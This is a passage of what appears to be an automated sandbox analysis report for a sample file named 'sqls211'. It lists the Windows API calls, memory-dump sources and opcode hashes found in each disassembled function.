                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GdiplusShutdownUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 3856339756-0
                                                                                                            • Opcode ID: 759822b3dc50db449b2b4e9cc6f18a771afbdc57e533c07eb7899544b7e86183
                                                                                                            • Instruction ID: 1658584647e0aba0b447ee0afdca330b7d0df24961190e4a3227804946fbbeb4
                                                                                                            • Opcode Fuzzy Hash: 759822b3dc50db449b2b4e9cc6f18a771afbdc57e533c07eb7899544b7e86183
                                                                                                            • Instruction Fuzzy Hash: 01E06D72604654EFCB11EB58DC06B59FBA9FB88B20F00426AF416D37A0CB74A801CAA5
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA254
                                                                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA280
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2673547680-0
                                                                                                            • Opcode ID: e3c77b335e96fd8d84cb9867d479ac8c5a146eff3c4ae2e44d276789372c5a97
                                                                                                            • Instruction ID: 40d495f7e1efcde5a5d71407508eb26e5e8639cd84a9e4c07fee9ead39c30e79
                                                                                                            • Opcode Fuzzy Hash: e3c77b335e96fd8d84cb9867d479ac8c5a146eff3c4ae2e44d276789372c5a97
                                                                                                            • Instruction Fuzzy Hash: 32E092325001286BCB50AB64DC09FE97B58EB083E5F044262FE58E3294DB70DE44CAA1
                                                                                                            APIs
                                                                                                            • _swprintf.LIBCMT ref: 00CDDEEC
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 00CDDF03
                                                                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010424,?), ref: 00CDB59E
                                                                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2718869927-0
                                                                                                            • Opcode ID: 1935fea4065bf4e41f9c2ef06663d4d5e722a14041990a61db8acacc373810bb
                                                                                                            • Instruction ID: 53121d0b300577812adef4f52182e9005048816b4c427017f1a61972ff3badf7
                                                                                                            • Opcode Fuzzy Hash: 1935fea4065bf4e41f9c2ef06663d4d5e722a14041990a61db8acacc373810bb
                                                                                                            • Instruction Fuzzy Hash: 89E0D8B241034866DF02BB60DC06FDE3B6C5B15785F040856F344DB2B3EA78EA50A771
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1175261203-0
                                                                                                            • Opcode ID: 7897a06d350d108bb6f2e8b1b00c71931eca85e37ccdb51a83b7119170371284
                                                                                                            • Instruction ID: 605f624d3a934571f306518ec5873533d3e08377ba50a9d1eb486a8d6e3741db
                                                                                                            • Opcode Fuzzy Hash: 7897a06d350d108bb6f2e8b1b00c71931eca85e37ccdb51a83b7119170371284
                                                                                                            • Instruction Fuzzy Hash: C0E012764001587ADF11A794DC09FDA7BACAF09391F040066B645D2144DA74DA84DAA0
                                                                                                            APIs
                                                                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CDA3E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BitmapCreateFromGdipStream
                                                                                                            • String ID:
                                                                                                            • API String ID: 1918208029-0
                                                                                                            • Opcode ID: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                                                                            • Instruction ID: fa14efc77a776fa9127a3f7d45163464c1a3db1f40bd62315043f94595e2d662
                                                                                                            • Opcode Fuzzy Hash: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                                                                            • Instruction Fuzzy Hash: 00E0ED71500218EBCB50EF55C54179ABBE8EB04360F10805BAA9697351E374FF04DB91
                                                                                                            APIs
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2BAA
                                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CE2BB5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                            • String ID:
                                                                                                            • API String ID: 1660781231-0
                                                                                                            • Opcode ID: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                                                                            • Instruction ID: 379308dc263a6dd2451f81de652551865d73416027ee4bb639b9d8bf98a164ba
                                                                                                            • Opcode Fuzzy Hash: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                                                                            • Instruction Fuzzy Hash: F2D022741643C02A4C243E733D0BF79338EAD51B787B00BAAF0328A4C1EE51A280B022
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemShowWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3351165006-0
                                                                                                            • Opcode ID: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                                                                            • Instruction ID: b268c6533427a23339467070f0941eccecf81cacc6b726044713af81d6a3c8a4
                                                                                                            • Opcode Fuzzy Hash: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                                                                            • Instruction Fuzzy Hash: 41C0123205C300BECB020BB4DC09C2BBBA8ABA5312F04C908B0A5C0260C23CC130DF21
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: d9eea51bc7e909ec721c07775a739f6df613db75998c0209918d32eb89e31d37
                                                                                                            • Instruction ID: eb19185973fdd5c588a98da5b24f985494a3e7ba84f642030a8cf9d88e375000
                                                                                                            • Opcode Fuzzy Hash: d9eea51bc7e909ec721c07775a739f6df613db75998c0209918d32eb89e31d37
                                                                                                            • Instruction Fuzzy Hash: 1FC19170A00254ABEF15DF6AC494FA97BA5AF06310F0C01BDEC569B297DB309E44CB61
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: 2bd0b9c051f504b9b1fec0362d7ed0bab7f8965e4798a06f1f1393cf558d0d76
                                                                                                            • Instruction ID: 88922e7829fd0fd1d6647ba81d6f341057ff1616b0077a60a8725d10167e6b95
                                                                                                            • Opcode Fuzzy Hash: 2bd0b9c051f504b9b1fec0362d7ed0bab7f8965e4798a06f1f1393cf558d0d76
                                                                                                            • Instruction Fuzzy Hash: B571F471500B849EDB35EB74D855FEBB7E9AF14300F40492EE2AB87242DA327A84DF11
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC8289
                                                                                                              • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                                                                              • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 2506663941-0
                                                                                                            • Opcode ID: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
                                                                                                            • Instruction ID: db93f7dc26b58680f72aefad0ff2a1943e6d8ef8eb65cef43edc1a6dc1b94f1c
                                                                                                            • Opcode Fuzzy Hash: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
                                                                                                            • Instruction Fuzzy Hash: 8641D6719446589ADB24EBA0CC55FEAB7B8AF00304F0804EFE59A97193EB705FC9DB10
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC13E1
                                                                                                              • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                                                                              • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                                                                            • Instruction ID: 20359fd918b34cc8f1ba067d66b3f68215b4e5623472c3c2e672620de31e77f4
                                                                                                            • Opcode Fuzzy Hash: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                                                                            • Instruction Fuzzy Hash: F24156B0905B409EE724DF7AC885AE6FAE5BF19300F54492EE5FF83282CB316654DB10
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC13E1
                                                                                                              • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                                                                              • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                                                                            • Instruction ID: ff2cb6316c78afa5243397c92b78ac1b1d71fce698e3cc7bb6e1349ed2df0e36
                                                                                                            • Opcode Fuzzy Hash: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                                                                            • Instruction Fuzzy Hash: 934136B0905B409AE724DF7A8885AE6FAE5BF19300F54492ED6FE83282CB316654DB11
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CDB098
                                                                                                              • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: 987b6b81842e9588fe01848999f675fc482516375752babe8404d502e66e4777
                                                                                                            • Instruction ID: 2ca2c5d52b57cf19085acfd6246cc057251f35ddba1e1eb703ce2348f369487b
                                                                                                            • Opcode Fuzzy Hash: 987b6b81842e9588fe01848999f675fc482516375752babe8404d502e66e4777
                                                                                                            • Instruction Fuzzy Hash: C8316A75810249EACF15EFA6C851AEEBBB4AF09304F14449EE809B7242D735AF04DB61
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(00000000,00CF3A34), ref: 00CEACF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 190572456-0
                                                                                                            • Opcode ID: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                                                                            • Instruction ID: 7824f002ddf0c2e71f09eec35e9ec191c81d99eda7c2d86d0247025a063c3941
                                                                                                            • Opcode Fuzzy Hash: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                                                                            • Instruction Fuzzy Hash: 31110633A002756F9B269E2FEC40A6A7395AB847607264221FC25EB264D731FE01C7D3
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: 8190cf6f987f89eb65332c54192a0b6134b399cf469749fc576fe9e0912a0cdb
                                                                                                            • Instruction ID: 855139c5af4f0fa2fd384bcbe2168cb0eb52ea5583a86be99f968f6cd247530e
                                                                                                            • Opcode Fuzzy Hash: 8190cf6f987f89eb65332c54192a0b6134b399cf469749fc576fe9e0912a0cdb
                                                                                                            • Instruction Fuzzy Hash: FC01A533900568ABCF21BBA8CC85FDEB731EF88750F05412DE812B7262DA34CE01D6A0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CEB136: RtlAllocateHeap.NTDLL(00000008,00CF3A34,00000000,?,00CE989A,00000001,00000364,?,?,?,00CCD984,?,?,?,00000004,00CCD710), ref: 00CEB177
                                                                                                            • _free.LIBCMT ref: 00CEC4E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 614378929-0
                                                                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                            • Instruction ID: b3a3472d510cc5782a0b131b34e99f2038b1e728b18163483431e197fba6df7c
                                                                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                            • Instruction Fuzzy Hash: C801D6722003856BE3318F66988596AFBE9EB85370F25051DE594972C1EA30A906C764
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00CF3A34,00000000,?,00CE989A,00000001,00000364,?,?,?,00CCD984,?,?,?,00000004,00CCD710), ref: 00CEB177
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
